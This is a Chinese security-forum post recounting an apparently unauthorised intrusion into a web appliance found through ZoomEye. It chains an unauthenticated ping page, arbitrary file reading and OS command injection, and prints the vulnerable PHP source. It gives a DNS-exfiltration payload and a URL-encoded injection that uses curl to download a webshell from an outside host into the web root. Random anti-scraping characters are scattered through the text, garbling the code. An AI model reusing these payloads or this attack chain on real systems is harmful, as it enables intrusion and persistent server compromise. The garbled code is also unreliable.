中国网络渗透测试联盟

标题: Web安全之实战通过os命令注入漏洞getwebshell [打印本页]
作者: admin    时间: 2022-3-31 01:39
标题: Web安全之实战通过os命令注入漏洞getwebshell
[md]**一、" {7 c9 B* V# }6 Q
** **寻找突破口**, f' ?4 V& ]" s# z# C
8 M" R- J' X6 q2 l/ G
**经过右键查看源代码发现系统的特征为:images/select_bg.png,去钟馗之眼搜索如图:**
2 ^: J5 _7 c7 f' f$ A# _, k0 }
5 [$ T4 i0 \( K( p& `* Z: \# B" H![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")( z; z9 o3 o: u4 i: P" l6 B( f. i

# o+ j8 r7 g; V- A$ n
  H, }$ W- l+ ^2 a7 H9 `5 c; \9 l; o+ T4 x8 k& \: Q
**发现reporter和[Technology,' F/ c6 {1 F6 O! K. r9 d% J( _1 x- m
Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all)都采用这个特征,然后一看之前搞过这样的系统,有源代码,对照源代码目录发现了未授权访问页面。**3 f( u( A/ Y! h# ~

: U0 F* V$ m! w+ ^; j/ l**地址为:**8 f# P- H. E* c1 {, `+ x
/ [& R0 W) b' ~- K
[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**,如图:**; n$ e1 D$ n4 y% L3 A4 B( |* h  v" F

4 O: u5 M3 h: d![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
( N6 ]1 i1 ?6 [# Q, {6 J
* s4 Z+ ~. M: ?& R% f
% O) v% `9 w; H" V! e: X3 P- l/ W% C- t& W" R7 q. B/ L4 E% J1 w
**测试ping这里的功能,发现可以绕过ping正常功能执行命令,payload为:**- r1 |7 W% @. J7 I* l

. z1 r; x7 d7 W$ ?- l**`whoami`.1111.ceye.io** **,如图:**- x6 |4 F& o! K' a0 }8 B
3 s8 I5 u% |8 ]' o+ p  `
![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")$ Y) N) d. h  U. ?# ~$ l7 \5 |

' {% Y! ^9 I, m' b7 n
2 H  B/ p& d8 d1 n3 w& q  Q1 N" w! Z4 @4 ?; K  A* Z0 Y7 V
**返回dns记录如图:**
3 y+ ]& _4 u3 P" {( E8 w. X' M+ I  l& J* I7 M! g4 h
![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
# l) }2 A* f$ b. ]; g* D. v( I7 x8 T2 Q, T* y  d4 j1 ]
2 ]# N/ n: _: l! I) K
; F. @9 y3 V; z
**发现当前用户权限为root**! D. g# a. q8 `, U$ ?% C
. @) a- w; V9 j. v& c! _; D
**一、
8 a9 N) c; s; e" b1 z$ E# I** **通过漏洞组合getwebshell**; c3 `6 R6 H3 x- }; ]
$ G* Z& b1 u+ A& y4 V! o, i( C
**    ** **文章就按照挖洞顺序往下写,紧接着执行pwd命令获取web路径,如图:**, T, y  X, h8 ^" Y! w

- n: B- Y, @! K1 c![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
" V4 A" G1 l2 `/ `: T, d
. V0 {: j0 a" U& t% [* m* D) ^( [( M8 ?; d

+ w, P! M' v" |) X5 y**得知网站路径为:/var/www/html/view/systemconfig/systemtool/**. b" [( B3 r; X! s4 L$ Y1 W
) L5 _2 s! d" n& Y
**正好利用burpsuite发现一处os命令注入漏洞与一处任意文件查看漏洞,如下图为任意文件查看漏洞截图**
. c# G) P" b- J3 X2 V8 _: x! s' s/ r( s9 N. F/ p) b4 S& t" p
![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
; v% S/ p7 l# j$ l, V
9 `6 ~; ~# B4 w% P% O**Os** **命令注入存的处为:/var/www/html/view/Behavior/toQuery.php,这个路径是通过第一步绕过ping命令正常功能执行命令漏洞获取到的,通过任意文件查看漏洞,我们读取一下源代码**$ w- s- i! n  W7 R0 Z- z
; o2 b0 b7 k1 m9 w$ i1 _! T
![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")\
. b9 Q! {- A% A8 ?  q& F
2 |& H6 M% M( b! k8 A* c  ?6 h5 \$ [4 x1 \$ r
**源代码为:**6 s+ R( b# i! Q! [
; r* z% b% ^! {: _& ?- S( r5 I
<?php
' d! v  `% B' ~2 @; k( l& A  ^) Ainclude_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
$ W0 h. J- T& q* a  G?>, _. \) x; l- `' Q
# E! A, V( x0 }; e+ p# x. m
<?php( _1 I' l2 I4 T" h9 M4 p0 q0 t

7 `# M' W6 ]8 ^
( C4 A" ?. g8 d7 i% K
. j, [* N0 H" F" S" Z% r# Zsession_start ();# s) N# f1 }6 q

  d9 p, r$ `' r( m- j6 L! K) \* d( ~5 N. ~, m. o
" B( W  [6 {# G1 G/ P, ?

! g" |1 t) ~  B1 X4 M* ?8 f' U
% t9 \9 B. Z' {* p- \9 ]3 X
& \% I' k+ n9 \$ X2 f4 b& r! A' Y5 _) C' W# {
if ($_GET ["objClass"] == "")
9 d  \6 `; s. w
! }+ q4 U% ]6 x6 [/ ?4 q* @  e
. r% I: f4 h4 q$ i1 r' W
# t0 a; \+ ]# ~8 [' M      exit ();
( K* C/ ?2 b% Q/ v5 K; c4 E. F" G) ]8 ~  y) l

# V, b6 b8 L/ G8 ~$ B/ c3 C
3 }4 q  T! u) S2 J8 g1 O; L$param = $_REQUEST;, K/ \4 d' b4 Y1 n

6 P8 l, K& y; L+ D
/ K: t( @; _2 @' |# _( e% n( E: n/ M1 y. [& E1 T# ~' W

0 t" z& Y1 ?, b* @3 m$ ^* g* E1 i$ ]" G

) ~7 u9 Z# O3 ~) E2 \8 G& F" O9 {, Y1 t9 J7 G
//echo "\n--------------------------\n";# H# I7 S2 C" K

) d" s# @. e' C& c1 c: L% x$ H" Y3 o2 N& f

* P+ l4 k/ _  L4 \+ m* Z//print_r($param);( n* z/ i9 u, t9 n! M8 N$ n

. |/ J: ]  n6 q5 N
: s6 b6 Y/ J' w, t; R8 M+ G6 R) L% J9 A
//echo "\n--------------------------\n";# s% i: I* Y0 A( J. h$ ^5 E% n. n

/ A& u4 b6 c; k
6 g' H* ~" }  Q5 B
; s2 H, ^! l& c! F# L[if ($_GET ["method"] ==
0 E3 I0 n# [0 R, K! g* E"getList" || $_GET ["method"] == "import" ||
( L2 p' Y# I3 M9 P4 S2 F! a$_GET ["method"] == "processAlarm") ](){
9 m9 n+ D" A" x& r" b" z
+ ?* O& _* k! [8 C$ V9 B3 h+ s/ W# m. l
* w  u( _$ o9 ?# j1 g2 S4 ~
      $param1 r; l6 k2 Q2 b- o$ \
["user"] = $_SESSION ["s_userName"];
$ i' K: B0 v# ?+ @2 C! ]- C2 v0 x+ j' }  c
/ d, H" D. i1 z
+ e- D% X3 T. i* F* s4 e3 b! l
      $param2 T% c2 d# V' X; I
["lan"] = $_SESSION ["lan"];/ l: b1 Q2 \( Q& x' F4 F( i
. G" K. r. U0 e, C( _- Y& j
: p$ ~) d2 U9 E2 H% a3 ]

+ L; l2 m$ ]% ]( W* Y' m      $param
! v% Q+ \3 O( e/ S# v* J["regUserpath"] = $_SESSION ["regUserpath"];# A' {9 y% d; y/ R( j; T
4 H+ G0 _! j' n7 c6 d! q$ N6 X1 {% }! i
' z( t: e) v0 E

' ^7 P& r: r. d3 P0 V    . t' q7 z# y# z" u5 y& e
+ A5 Y9 u8 P7 N; X7 s% d7 H/ T" N, o

; y8 H; m; Y% D7 V& x# b. S# l5 s) q  ~/ O9 X
      exec (8 e" R% ^( [/ p2 P
"rm -rf /tmp/cache" );, R; k: t' e. J+ {; [6 k# W* E

6 v9 K8 d  ?/ O( a4 X6 w4 d& \5 _6 u* n. F( |
: S- q1 y4 L& Y6 _+ z( o0 j
      [$cmd = "/usr/local/php/bin/php ".$_SERVER: s3 w8 x; k: i; J$ J
["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";]()
1 v" x2 j3 g# ?% j& ^& k+ }9 ^& R3 u& l

7 v# f( X% q0 c$ Y* Q* h% y, y. u( x6 [+ H- u, H6 ?* n% w
      $cmd .=
# {. z7 b. b  T. B' X. r" " . $_GET ["objClass"];
0 X9 a  G# a; f2 t+ s3 u1 e: i4 j. @) C

+ M& r" d- X/ R5 ~7 J
; ]( t" f8 N6 T0 O0 o0 i, |3 e      $cmd .=
0 E8 R. @8 v3 d, V+ \3 M" " . $_GET ["method"];3 J- q  h+ e/ q$ J' X  D" D' D
" u/ L2 b! b4 ^" ^7 |
. c+ k6 x0 P' F! b6 b1 y8 x
* L# `& a# I! }
      $cmd .=* V8 e% E; n6 K
" " . base64_encode ( json_encode ( $param ) );
  K0 m5 O" Q+ ^  e0 V& y7 V0 J) Z* c1 @' x
  P* ^1 ~5 m% A* p
- K6 m% g% L& L8 B2 J2 u7 d" Z6 U
      [file_put_contents("/tmp/query_cmd",$cmd);]()
  }7 M  e: F9 t8 v! S( i0 E
; }. t( \5 Z9 E6 g$ a3 a+ h
) M0 c# h6 z8 O$ ~& P/ d$ c
2 v# A; I8 R& U# q      exec ( $cmd . "
0 g5 d- N4 F1 u5 }6 N% K> /dev/null &" );
9 W, {4 Q2 w) w' a0 g; e. m) a

" K' z4 A8 Z1 `2 Z
5 c" |& w% S! F2 Q, m6 @3 M0 L( s; a; Z& r8 U
" g4 w/ i& m  K7 I% D+ g& S
} else {
/ I7 V5 j1 K) B: B/ @+ H# e: z; ], O" }2 p  @# _) V

. ^/ q$ U$ [* `3 |+ }0 K5 ?1 l4 |5 ]5 S; d% N
      require_once
( W4 F2 O! y; i1 G( q2 i. X($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");0 M2 C. x' ~: t1 N+ A

* H5 P, S5 j+ H& |2 Z# v+ _: K' k1 c2 J7 u

: X0 J7 D7 L, M2 R' A) n      $obj = new% X. V# S. i, U/ X9 O
QueryInterface ();
" a( k" u' R' {6 g  j: w0 F% v, A3 P6 T2 r' U2 {

2 p5 C+ H6 G9 q
( C, O4 y, B+ W      $instance =" h% R) O& ]* R  J/ D- P. J0 K8 o
$obj->getInstance ();
. W8 i; ?$ ^: ^6 ~
1 R" `7 t5 @+ |% u0 l$ G6 v" x2 Q; G5 c0 ]8 g6 o4 o
5 Q0 T8 a6 }( Z! ^) d- Q% `6 R
      $instance->invokeMethod; p1 K! P# `2 I4 Q2 C- a
( $_GET ["objClass"], $_GET ["method"], $param );* @0 j5 G1 E' h( q

  z- A- L& x: r
+ W' T; L; t5 u( H4 q5 `' G6 d" u
}
9 H1 x9 i4 g  [6 {$ F, \& d* f
3 ]) d: e8 h6 l0 k9 K7 ?
1 `$ ^9 T: O  `+ m+ B1 }3 l% p( @! Z+ L9 H9 [4 h' m
exit ();
+ F6 N: `4 |7 ~: v! [! Z8 a* G$ M7 s/ E
+ A9 Z/ l# f4 U( X+ A

- l& y0 n& n1 g1 A?>
$ c1 |. P! [) N3 i9 `/ t: B( y  {. `
9 g( y8 K' b3 C' G# ?. j**经常简单审计发现if ($_GET3 K( T3 s# T& j4 h: t
["method"] == "getList" || $_GET ["method"] ==6 n( v! n% B1 I
"import" || $_GET ["method"] == "[processAlarm]()"),如果method只要等于getList、import、processAlarm这其中一个,$cmd =9 G2 S* A, P& K/ l6 F) ~: L
"/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] .9 q' l" u! r  m1 p$ H! l4 E# q  H
"[system/behavior/behavior_query.php]()";  cmd等于web绝对路径+ system/behavior/behavior_query.php,然后file_put_contents("/tmp/query_cmd",$cmd);**
$ p0 {$ C. V( t4 R( z: B" p0 F
  Z) r5 ~: Z, z& m0 U4 U+ `1 A**      exec ( $cmd
8 P8 A* u6 Z( p  c* I$ p. "  > /dev/null &" );** **给我们构造了一个命令注入的参数,这里直接造成了OS命令注入漏洞,下面看我演示**
5 k0 r( ]: S+ K  C! C9 g7 @4 M9 X& C6 [  v0 `, M' B4 W$ ^) S; D

; O1 \; N, j+ p# i3 L. ~![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")/ o( h$ @  H( o/ D5 U9 C
( v- `; q; u4 o8 I" F
; \) A9 ?* o( z7 ]* W# R1 W/ P

, B3 G$ K# W7 t1 O/ t' ~**图中objClass=存在OS命令注入漏洞,我之前试图通过bash反弹shell,但是测试了一晚上没反弹成功,最后选择了curl下载webshell,payload如下:**
, h) B+ x/ r5 {% l  J
; A2 ?, ~" W: W0 A( P**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**
: e- m9 L+ S, j1 s$ K: |
, S# w* I1 V& s9 l" i+ z**我们用url解码如下:**
: t. V( U- o, t7 H4 i  l7 u6 w1 p: ~4 N- l. j( `: L% `, h
**|curl http://1.1.1.1/qYCwxRz1.zip -o2 k% c8 @7 [3 s
/var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o6 Y, p' W2 q( U% P9 ?
/var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl ** [**http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php**](http://8.136.218.186/qYCwxRz1.zi ... l/images/suiji2.php)
2 c; a0 @: G3 Z, q, D; y/ y  R& e
9 K% G6 [: h  M. P/ w- F4 r**使用这么多管道符|就是要闭合payload,最后成功curl下载webshell如图:**
. \4 F) R, U+ t$ s/ f, _1 L; a# u# ]$ h# ^8 r

( H( _9 M- f3 |" F* S![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
6 t- B) {1 @8 g! x) u0 t4 R% Z7 ?* ?* j) ]5 o" L& z) \7 m- A

3 |# _2 s+ p9 }" X
0 ~; @; Q& w( B9 P% u/ g; w! ~' r- Y; S
**三、总结**
8 o1 P2 m- o, v" N; |4 L% e. x0 d% B+ C! o; J- N& S- x
**   ** **案例之所以最终获得webshell,很大程度上是取决于几个漏洞的组合,首先通过右键查看源代码找到目标系统使用的系统,因为之前测试过与目标类似的程序。然后“对症下药”找到了ping未授权访问页面,通过绕过ping命令正常功能执行pwd命令获取到网站绝对路径,其次,使用任意文件查看漏洞去读取疑似存在os命令执行漏洞的php进行简单审计,经过确认存在此漏洞,最后构造os命令执行payload,最终getwebshell,整个getwebshell过程就是一个漏洞的连环组合,渗透更多的时候是靠运气,如果这几个环节有一个环节漏洞不存在或者没挖到,可能导致getwebshell失败。**7 o& J- u) i* ?7 U; L

( X8 U6 H% V' G1 i**   ** **综上所述,运气与挖洞功底同等重要,谢谢观看** **! **
7 L1 J- o! J; B! P[/md]



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2